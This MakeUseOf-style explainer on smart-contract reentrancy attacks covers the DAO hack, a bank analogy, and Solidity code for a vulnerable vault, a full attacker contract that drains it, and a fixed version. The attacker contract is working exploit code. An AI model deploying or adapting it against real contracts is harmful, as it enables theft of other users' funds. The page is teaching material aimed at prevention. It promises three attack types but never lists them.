What Is a Reentrancy Attack and How Does It Work? – MUO – MakeUseOf
Some of the biggest hacks in the blockchain industry, in which millions of dollars' worth of cryptocurrency tokens were stolen, resulted from reentrancy attacks. While these hacks have become less common in recent years, they still pose a significant threat to blockchain applications and their users.
So what precisely are reentrancy attacks? How are they deployed? And are there any measures developers can take to prevent them from happening?
A reentrancy attack occurs when a vulnerable smart contract function makes an external call to a malicious contract and, in doing so, temporarily hands control of execution to it. The malicious contract then calls back into the original function, repeatedly, before that function has finished executing and updated its state, draining the contract's funds along the way.
A naively written withdrawal function on Ethereum follows three steps: confirm the caller's balance, send the funds, and then update the stored balance. If an attacker can re-enter the function between the send and the balance update, the balance check passes again, and they can keep withdrawing until the contract is drained.
One of the most infamous blockchain hacks, the 2016 Ethereum DAO hack, as covered by Coindesk, was a reentrancy attack that led to the loss of over $60 million worth of ETH and fundamentally changed the course of the second-largest cryptocurrency.
Imagine a bank in your hometown where virtuous locals keep their money; its total liquidity is $1 million. However, the bank has a flawed accounting system: staffers wait until the evening to update account balances.
Your investor friend visits the town and discovers the accounting flaw. He opens an account and deposits $100,000. A day later, he withdraws $100,000. An hour after that, he tries to withdraw $100,000 again. Since the bank has not updated his balance, it still reads $100,000, so he gets the money. He repeats this until there is no money left. Staffers only realize the vault is empty when they balance the books in the evening.
In the context of a smart contract, the process goes as follows. The attacker deploys a contract of their own and deposits a small amount into the vulnerable contract so that the balance check will pass. The attacker's contract then calls the withdrawal function. The vulnerable contract confirms the balance and sends the ether, and that send hands execution to the attacker contract's fallback code before the balance has been updated. The fallback calls the withdrawal function again; the balance check passes again because nothing has been written yet, and the cycle repeats until the vulnerable contract is empty or the attacker chooses to stop. Only when the nested calls unwind is the balance finally updated, by which time the funds are gone.
Generally, the attacker walks away with far more than they deposited, stealing the funds of everyone else who used the contract.
So how exactly does a reentrancy attack occur at the code level? Here's a hypothetical smart contract with a reentrancy vulnerability. We'll use self-explanatory names to make it easier to follow along.
The VulnerableContract lets users deposit ether into the contract using the deposit function. Users can then withdraw their deposited ether using the withdraw function. However, the withdraw function has a reentrancy vulnerability: it sends the ether to the caller's address before it updates the caller's stored balance. Because sending ether is itself a call into the recipient, a recipient that is a contract gets to run code at that moment, and that is the opening the attacker exploits.
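As an added example (not code from the original article), here is a minimal Solidity vault with the flaw the text describes. The contract and function names (VulnerableContract, deposit, withdraw, balances) follow the article's naming; the full-balance withdrawal, the poolBalance helper and the Solidity 0.8 pragma are this example's choices:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the article's own code: a minimal vault with the
// reentrancy flaw described in the text. Names are chosen for illustration.
contract VulnerableContract {
    mapping(address => uint256) public balances;

    // Credit the caller's balance with the ether sent along with the call.
    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // Withdraw the caller's entire balance.
    //
    // Step 1 (check):       read and confirm the balance.
    // Step 2 (interaction): send ether with a low-level call, which forwards
    //                       the remaining gas and runs the recipient's
    //                       receive()/fallback() if the recipient is a contract.
    // Step 3 (effect):      zero the balance ONLY after the call returns.
    //
    // Because step 3 runs after step 2, a contract recipient can call
    // withdraw() again from its receive() while balances[msg.sender] still
    // holds the original value, and the check in step 1 passes again.
    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");

        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");

        balances[msg.sender] = 0; // state update happens too late
    }

    // Convenience view so a reader can watch the pool drain.
    function poolBalance() external view returns (uint256) {
        return address(this).balance;
    }
}
```

The full-balance form (`balances[msg.sender] = 0`) is chosen deliberately. A variant that takes an amount and does `balances[msg.sender] -= amount` has the same ordering flaw, but under Solidity 0.8's checked arithmetic the nested calls would revert on underflow as they unwind, which masks the bug in a demonstration without fixing it; older compilers or an `unchecked` block behave like the code above.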
Now, here's what an attacker's smart contract would look like.
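An attacker contract for such a vault, as an added example that is not the article's own code. It assumes the target exposes deposit() and withdraw() with the shapes declared in the IVulnerable interface; the names Attacker, attack, collect, ATTACK_AMOUNT and MAX_ROUNDS, and the 1 ether attack size, are this example's:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the article's own code. The target is assumed to expose
// exactly these two functions.
interface IVulnerable {
    function deposit() external payable;
    function withdraw() external;
}

contract Attacker {
    IVulnerable public immutable target;
    address public immutable owner;

    uint256 private constant ATTACK_AMOUNT = 1 ether;

    // Bound the nesting depth. Every nested call gets less gas than its
    // parent (the EVM holds back 1/64 per level), and a nested call that runs
    // out of gas would revert the whole transaction, so a large pool is
    // drained over several attack() transactions rather than one deep one.
    uint256 private constant MAX_ROUNDS = 10;
    uint256 private rounds;

    constructor(address _target) {
        target = IVulnerable(_target);
        owner = msg.sender;
    }

    // Step 1: seed a balance so the target's check passes, then start the
    // first withdrawal. Must be called with exactly ATTACK_AMOUNT.
    function attack() external payable {
        require(msg.sender == owner, "not owner");
        require(msg.value == ATTACK_AMOUNT, "send exactly 1 ether");
        rounds = 0;
        target.deposit{value: ATTACK_AMOUNT}();
        target.withdraw();
    }

    // Steps 2..n: the target's call{value: ...}("") lands here BEFORE it has
    // zeroed our balance, so calling withdraw() again passes its check and
    // pays out ATTACK_AMOUNT once more. Stop when the pool cannot pay or the
    // depth limit is reached; the nested calls then unwind normally.
    receive() external payable {
        rounds += 1;
        if (rounds < MAX_ROUNDS && address(target).balance >= ATTACK_AMOUNT) {
            target.withdraw();
        }
    }

    // Sweep the proceeds once the outer attack() call has returned.
    function collect() external {
        require(msg.sender == owner, "not owner");
        (bool ok, ) = owner.call{value: address(this).balance}("");
        require(ok, "sweep failed");
    }
}
```

One attack() transaction here yields up to MAX_ROUNDS payouts of ATTACK_AMOUNT for a single deposit of ATTACK_AMOUNT; the owner repeats attack() until the pool holds less than one payout.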
When the attack is launched, the attacker's contract deposits ether into VulnerableContract and immediately calls withdraw. VulnerableContract reads the attacker's balance, passes the check, and sends the ether. That send runs the fallback code of the attacker's contract, which calls withdraw again while the stored balance is still unchanged. Each nested call passes the same check and sends the same amount, until the attacker's contract stops re-entering. The calls then unwind, and only at that point does VulnerableContract set the attacker's balance to zero.
All of this happens inside a single transaction, so a small contract can be emptied within one block. Each nested call receives a little less gas than the one before it, so the depth of a single drain is bounded, and emptying a large contract takes many transactions. The DAO, whose drain led to the hard fork that split Ethereum into Ethereum and Ethereum Classic, was emptied over several hours.
To prevent a reentrancy attack, we need to modify the vulnerable smart contract to follow the best practices for secure smart contract development. In this case, we implement the "checks-effects-interactions" pattern, which performs all checks first, then writes every state change, and makes external calls last, as in the code below.
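The repaired vault, as an added example rather than the article's own code. FixedContract is this example's name; isLocked, deposit, withdraw and balances follow the article's naming:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the article's own code: the same vault with withdraw()
// reordered to checks-effects-interactions and guarded by a per-account lock.
contract FixedContract {
    mapping(address => uint256) public balances;
    mapping(address => bool) private isLocked;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        // Checks: refuse a nested call from an account already withdrawing,
        // and refuse an empty balance.
        require(!isLocked[msg.sender], "reentrant call");
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");

        // Effects: lock the account and zero the balance BEFORE any external
        // call, so a re-entered withdraw() sees a locked account with a zero
        // balance and fails at the checks above.
        isLocked[msg.sender] = true;
        balances[msg.sender] = 0;

        // Interaction: the external call comes last.
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");

        // Release the lock so the account can withdraw again later.
        isLocked[msg.sender] = false;
    }
}
```

Either defence alone stops the attack described above: once the balance is zeroed before the call, a re-entered withdraw() fails the amount check, and the lock is an independent second barrier. Because the lock is keyed per account and set only in withdraw, it must also be applied to any other state-changing function an attacker could re-enter from the callback; a single contract-wide flag, as provided by OpenZeppelin's ReentrancyGuard through its nonReentrant modifier, covers every guarded function at once.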
In this fixed version, we've introduced an isLocked mapping that records whether an account has a withdrawal in progress. When a user initiates a withdrawal, the contract first requires that their account is not locked (!isLocked[msg.sender]), meaning no other withdrawal from the same account is in flight.
If the account isn't locked, the contract locks it, updates the stored balance, and only then makes the external call; a re-entered call would now fail both the lock check and the balance check. After the external call returns, the account is unlocked again, allowing future withdrawals.
Generally, there are three main types of reentrancy attacks, classified by how the re-entry is exploited.
Reentrancy attacks can manifest in different forms and so require specific measures to prevent each.
Reentrancy attacks have caused substantial financial losses and undermined trust in blockchain applications. To protect contracts, developers must adopt best practices diligently to avoid reentrancy vulnerabilities.
They should also implement secure withdrawal patterns, use trusted libraries, and conduct thorough audits to further strengthen a contract's defenses. Staying informed about emerging threats and being proactive about security helps developers uphold the integrity of the blockchain ecosystems they build on.